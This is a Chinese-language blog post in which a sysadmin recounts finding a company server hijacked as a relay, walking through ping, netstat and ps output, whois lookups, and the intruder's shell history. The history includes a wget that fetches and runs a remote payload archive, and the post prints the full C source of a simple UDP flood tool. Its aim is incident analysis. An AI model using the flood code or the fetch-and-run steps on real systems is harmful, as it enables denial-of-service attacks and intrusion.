2012年4月23日 星期一

server又被抓去當跳板了........


平常到公司第一件事就是開瀏覽器上網(誤),今天上班當然也不例外,不過.......嗯,今天網路好像斷了,都連不出去,連到server看了一下,ping google的dns server都不會動,看來網路應該是掛了,我只好先吃個早餐......(再誤)

一邊吃早餐,一邊盯著螢幕亂看,突然撇到其實是ping得到,只是掉封包掉得很嚴重,平常就算網路再慢,頂多就是ping的時間會長一點,還沒看過封包可以掉這麼多的,李組長眉頭一皺,發覺案情並不單純......

$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_req=3 ttl=48 time=37.7 ms
64 bytes from 8.8.8.8: icmp_req=16 ttl=48 time=38.7 ms
64 bytes from 8.8.8.8: icmp_req=28 ttl=48 time=36.2 ms
64 bytes from 8.8.8.8: icmp_req=44 ttl=48 time=35.7 ms
64 bytes from 8.8.8.8: icmp_req=57 ttl=48 time=36.7 ms
^C
--- 8.8.8.8 ping statistics ---
59 packets transmitted, 5 received, 91% packet loss, time 58352ms
rtt min/avg/max/mdev = 35.782/37.041/38.753/1.091 ms

因為沒有root權限,也不知道要看什麼,只知道TX的封包非常的多,多到一個靠盃的地步,用netstat看了一下,發現這地方似乎怪怪的:
$ netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0  85760 xx-xxx-xxx-xxx.xx:33998 ec2-23-20-86-95.com:ssh ESTABLISHED

再ps一下,好像真的怪怪的...
$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
xxxxxx    2497 22.3  0.0   1712   436 ?        S    04:12  66:10 ./std 23.20.86.95 22

後來長輩KH來上班了,馬上看了該帳號的.bash_history,長輩果然是長輩,馬上就看出端倪來:
$ cd xxxxxx
$ cat .bash_history
w
uname -a
cd /tmp
ls -a
cd .ss
ls -a
nohup ./202.231  >>/dev/null &
nohup ./mass 202.231  >>/dev/null &
nohup ./a 202.231  >>/dev/null &

cd /dev/shm
ls -a
cd /dev/shm
ls -a
cd /tmp
ls -a
rm -rf .ss
cd /dev/shm
ls -a
wget lighthd.altervista.org/pid.tgz
tar zxvf pid.tgz
rm -rf pid.tgz
cd poid
]
cd pid
ls -a
rm -rf pid.tgz
ls -a
cd pid
ls -a
./start

身為鍵盤科南,當然要把pid.tgz抓下來看一下,裡面滿多檔案的,有shell script,也有binary,直接用notepad++打開std這隻binary,發現了這樣的字串:
[STD2.C BY STACKD] Syntax: %s host port
於是google了STD2.C BY STACKD,找到了std的source code,usage和ps看到的結果一致,看起來應該是同一隻程式:
/* STD.C By stackd - (root@stackd.net) Define strings to what you feel fit */

#define STD2_STRING "std"
#define STD2_SIZE 50
#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
int echo_connect(char *, short);
int echo_connect(char *server, short port)
{
   struct sockaddr_in sin;
   struct hostent *hp;
   int thesock;
   hp = gethostbyname(server);
   if (hp==NULL) {
      printf("Unknown host: %s\n",server);
      exit(0);
   }
   printf(" STD.C -- Packeting %s:%d\n ", server, port);
   bzero((char*) &sin,sizeof(sin));
   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
   sin.sin_family = hp->h_addrtype;
   sin.sin_port = htons(port);
   thesock = socket(AF_INET, SOCK_DGRAM, 0);
   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
   return thesock;
}
main(int argc, char **argv)
{
   int s;
   if(argc != 3)
   {
      fprintf(stderr, "[STD2.C BY STACKD] Syntax: %s host port\n",argv[0]);
      exit(0);
   }
   s=echo_connect(argv[1], atoi(argv[2]));
   for(;;)
   {
      send(s, STD2_STRING, STD2_SIZE, 0);
   }

}

程式內容滿簡單,大概就是狂抽猛送小封包,根據上面ps的結果來看,就是一直往23.20.86.95的port 22塞小封包,用whois看查了一下這個ip:
OrgName:        Amazon.com, Inc.
OrgId:          AMAZO-4
Address:        Amazon Web Services, Elastic Compute Cloud, EC2
Address:        1200 12th Avenue South
City:           Seattle
StateProv:      WA
PostalCode:     98144
Country:        US
RegDate:        2005-09-29
Updated:        2009-06-02
Comment:        For details of this service please see
Comment:        http://ec2.amazonaws.com/
Ref:            http://whois.arin.net/rest/org/AMAZO-4

嗯,靠盃阿,竟然是amazon......再看一下xxxxxx最後登入的紀錄:
last|grep xxxxxx
xxxxxx   pts/3        adsl-6-227.37-15 Mon Apr 23 03:07 - 03:09  (00:02)
xxxxxx   ssh          adsl-6-227.37-15 Mon Apr 23 03:07 - 03:09  (00:02)

再查一下他的ip:
OrgName:        Headquarters, USAISC
OrgId:          HEADQU-3
Address:        NETC-ANC CONUS TNOSC
City:           Fort Huachuca
StateProv:      AZ
PostalCode:     85613
Country:        US
RegDate:        1990-03-26
Updated:        2011-08-17
Ref:            http://whois.arin.net/rest/org/HEADQU-3

然後再google Headquarters, USAISC,發現了這篇blog,不過他文中的Headquarters, USAISC是在Washington, DC,而我用whois查出來的是在Arizona,不過這應該也是跳板。

鍵盤科南今天就只能查到這樣了,再來也不知道要查什麼了 XD